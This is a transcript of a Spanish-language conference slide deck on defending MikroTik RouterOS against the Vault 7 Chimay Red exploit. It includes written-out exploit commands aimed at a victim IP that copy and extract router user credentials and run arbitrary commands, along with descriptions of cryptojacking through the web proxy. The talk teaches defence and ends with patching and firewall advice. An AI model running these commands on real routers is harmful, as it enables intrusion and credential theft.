Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos...
Transcript of Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos...
![Page 1: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/1.jpg)
Prozcenter
Cursos oficiales
Dictamos entrenamientos oficiales en
modalidad presencial y virtual de Mikrotik,
redes TCP/IP y otras marcas.
Consultoría
Somos un grupo de consultores
profesionales con mas de diez años de
experiencia en las áreas de redes y TI.
Soporte
Contamos con un equipo de profesionales
certificados, listos para ofrecer soporte
sobre redes ISP y empresariales.
![Page 2: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/2.jpg)
Capacitaciones
Introducción a redes TCP/IP
Diseño y administración de redes
ISP
Diseño y administración de redes
empresariales
Carrera Mikrotik
● INTROMT
● MTCNA
● MTCTCE
● MTCRE
● MTCWE
● MTCUME
● MTCINE
● MTCIPv6E
![Page 3: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/3.jpg)
Servicios
Consultoría y Soporte a demanda
● Por hora
● Por paquete de horas
Planes de Soporte
● Centro de Soporte para ISP
● Centro de Soporte para
Empresas
![Page 4: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/4.jpg)
NOC
Monitoreo de Redes
● Detección y Alerta
● Qos
● BGP Peering
Sizing
● Cambios Ingenieria
● Despliegue IPv6
![Page 5: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/5.jpg)
Emmanuel Schonberger
Protecting RouterOS from VAULT7
![Page 6: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/6.jpg)
Acerca de mí
Consultor de Redes y Ciberseguridad
Experiencia tanto en el ámbito privado como la administración
pública. 10 años en el campo de Networking y más de 5 en
Ciberseguridad. Poseo las Certificationes MTCNA, MTCIPv6E,
UBWA, PPT, CEH.
Soy instructor de Redes y Seguridad Informática.
En simples palabras -Un Bombero del BIT++
![Page 7: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/7.jpg)
Un poco de HISTORIA
![Page 8: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/8.jpg)
![Page 9: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/9.jpg)
Press Release
Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency.
The first full part of the series, "Year Zero", comprises 8,761 documents and files
https://wikileaks.org/ciav7p1
![Page 10: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/10.jpg)
htt
ps://y
ou
tu.b
e/F
pg
qX
lky-w
c
![Page 11: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/11.jpg)
https://wikileaks.org/vault7
![Page 12: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/12.jpg)
Suite de Malware
multiplataforma encargada de
implantar software C2C (Command
& Control) la cual provee
acceso vía puertas traseras.
Plataformas afectadas: Windows,
Linux, Solaris, MikroTik.
HIVE
![Page 13: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/13.jpg)
HIVE
Desarrollado para funcionar en el
2do Anillo de ejecución del OS.
Funciones principales Beaconing y
Shell access.
![Page 14: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/14.jpg)
2do ANILLO
Anillo 0 para el código del
núcleo y los controladores
de dispositivos. -Kernel-
Anillo 2 para el código
privilegiado (programas de
usuario con permisos de
acceso de entrada/salida)
Anillo 3 para el código sin
privilegios (casi todos los
programas de usuario).
![Page 15: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/15.jpg)
https://wikileaks.org/ciav7p1
![Page 16: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/16.jpg)
TRIGGER
https://wikileaks.org/vault7/document/hive-Operating_Environment/hive-Operating_Environment.pdf
![Page 17: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/17.jpg)
https://wikileaks.org/vault7/#Hive
![Page 18: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/18.jpg)
La ingeniería reversa tiene como objetivo obtener información o un diseño a partir de un producto, con el fin de determinar cuáles son sus componentes y de qué manera interactúan entre sí y cuál fue el proceso de fabricación.
![Page 19: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/19.jpg)
IDAPRO
https://www.hex-rays.com/products/ida
![Page 20: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/20.jpg)
Chimay RedZero-day exploit for the HTTPmanagement/configuration/proxy webservercalled www in MK RouterOS versions 6.x,originally targeting MIPS, PPC, and x86architectures.
![Page 21: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/21.jpg)
VERSIONES AFECTADAS <6.38.4
![Page 22: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/22.jpg)
https://www.exploit-db.com
![Page 23: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/23.jpg)
![Page 24: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/24.jpg)
![Page 25: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/25.jpg)
GIT CLONING
![Page 26: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/26.jpg)
Modulos
![Page 27: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/27.jpg)
StackClash_x86 y mips
Permitirán ejecutar comandos
![Page 28: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/28.jpg)
StackClash_resock_mips
Reutiliza el socket HTTP con el fin de tener una SHELL sin requerir reverse conection.
![Page 29: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/29.jpg)
![Page 30: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/30.jpg)
/tools
![Page 31: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/31.jpg)
DEMOrobo credenciales
StackClash_x86.py IP_VICTIMA 80 EJECUTABLE "cp /rw/store/user.dat /ram/winbox.idx"
curl -s http://IP_VICTIMA/winbox/index | ./tools/extract_user.py -
![Page 32: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/32.jpg)
MsgMe
./tools/getROSbin.py 6.38.4 mipsbe /nova/bin/www EJECUTABLE
StackClash_mips.py IP_VICTIMA 80 EJECUTABLE "echo hello world > /dev/lcd"
![Page 33: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/33.jpg)
Logo
StackClash_resock_mips.py IP_VICTIMA 80 EXECUTABLE docs/logo.bmp /flash/boot/logo.bmp
![Page 34: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/34.jpg)
UNA VEZ DENTRO
hay que ser CREATIVO++
![Page 35: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/35.jpg)
Mario Sound
StackClash_mips.py VICTIMA 80 EXECUTABLE "while [ true ]; do /nova/bin/info ':beep frequency=660
length=100ms;:delay 150ms;:beep frequency=660 length=100ms;:delay 300ms;:beep frequency=660
length=100ms;:delay 300ms;:beep frequency=510 length=100ms;:delay 100ms;:beep frequency=660
length=100ms;:delay 300ms;:beep frequency=770 length=100ms;:delay 550ms;:beep frequency=380
length=100ms;:delay 575ms;:beep frequency=510 length=100ms;:delay 450ms;:beep frequency=380
length=100ms;:delay 400ms;:beep frequency=320 length=100ms;:delay 500ms;:beep frequency=440
length=100ms;:delay 300ms;:beep frequency=480 length=80ms;:delay 330ms;:beep frequency=450
length=100ms;:delay 150ms;:beep frequency=430 length=100ms;:delay 300ms;:beep frequency=380
length=100ms;:delay 200ms;:beep frequency=660 length=80ms;:delay 200ms;:beep frequency=760
![Page 36: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/36.jpg)
COINHIVE
![Page 37: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/37.jpg)
![Page 38: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/38.jpg)
![Page 39: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/39.jpg)
![Page 40: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/40.jpg)
HOW TO
![Page 41: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/41.jpg)
CASO 1 - SOLO ERRORES
![Page 42: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/42.jpg)
El atacante crea un archivo error.html con el código malicioso
![Page 43: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/43.jpg)
Código Malicioso
![Page 44: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/44.jpg)
Web Proxy
![Page 45: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/45.jpg)
Implementación
Se configura el web proxy
para que se dispare el
COINHIVE cada vez que haya
un error al cargar un
sitio o parte de el
(ej: ADS).
Esto produce un impacto
leve al usuario. Dado que
no debería haber muchos
errores en un sitio web.
![Page 46: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/46.jpg)
CASO 2 - TODOS LOS SITIOS
![Page 47: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/47.jpg)
Auto Download Script
![Page 48: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/48.jpg)
SCHEDULER
![Page 49: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/49.jpg)
EJEMPLO
![Page 50: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/50.jpg)
En algunos casos se encontró el archivo mikrotik.php, posible residuo (0 BYTES).
![Page 51: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/51.jpg)
SOCKS
PLATAFORMA DE
SALTO
![Page 52: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/52.jpg)
SNIFFER
![Page 53: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/53.jpg)
ESTADO DE SITUACIÓN
![Page 54: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/54.jpg)
![Page 55: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/55.jpg)
![Page 56: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/56.jpg)
![Page 57: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/57.jpg)
![Page 58: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/58.jpg)
Porque Ocurrio esto?
Falta de Actualización de RouterOS y Políticas de Firewall Blandas.
![Page 59: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/59.jpg)
MIKROTIKMitigación
Se parcheo la Falla (1 dia
luego de ser descubierta).
-version 6.38.5-
Keep up the good Work
Mikrotik :-)
https://blog.mikrotik.com/security/www-vulnerability.html
![Page 60: Prozcenter - MikroTik · 2018-11-18 · Prozcenter Cursos oficiales Dictamos entrenamientos oficiales en modalidad presencial y virtual de Mikrotik, redes TCP/IP y otras marcas. Consultoría](https://reader030.fdocuments.ec/reader030/viewer/2022040917/5e913011c8ec74775472e356/html5/thumbnails/60.jpg)
https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router
PREVENCION
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=80,8291 action=drop
Verificar Scheduler / Archivos Creados / Usuarios Creados / SOCKS / Packet Sniffer